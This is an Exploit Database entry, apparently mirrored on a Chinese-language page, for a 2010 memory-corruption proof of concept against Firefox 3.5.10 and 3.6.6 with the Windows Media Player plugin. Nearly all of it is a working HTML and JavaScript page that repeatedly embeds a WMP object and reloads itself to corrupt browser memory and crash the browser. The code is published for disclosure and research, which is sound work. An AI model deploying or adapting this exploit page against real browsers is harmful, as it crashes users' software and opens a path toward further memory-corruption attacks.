Mozilla Firefox 3.5.10/3.6.6 – ‘WMP’ Memory Corruption Using Popups

• Exploit Database
• 36 阅读

• 作者： Skylined
  日期： 2010-10-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15242/

• Source: http://code.google.com/p/skylined/issues/detail?id=21
  
  # Exploit Title: Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups
  # Date: 2010-10-13
  # Author: berendjanwever
  # Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11
  # Tested on: Windows XP sp3
  
  <HTML>
  <HEAD>
  <SCRIPT>
  function go() {
  var oWMP = document.getElementById("WMP");
  if (oWMP) {
  location.reload();
  } else {
  var oWrapper = document.getElementById("wrapper");
  oWrapper.innerHTML = '<EMBED id="WMP" type="application/x-mplayer2" autostart=1 src="https://www.exploit-db.com/exploits/15242/repro-firefox.html"></EMBED>';
  setTimeout(go, 1000);
  }
  }
  </SCRIPT>
  </HEAD>
  <BODY onload="go()">
  <SPAN id="wrapper"></SPAN>
  </BODY>
  </HTML>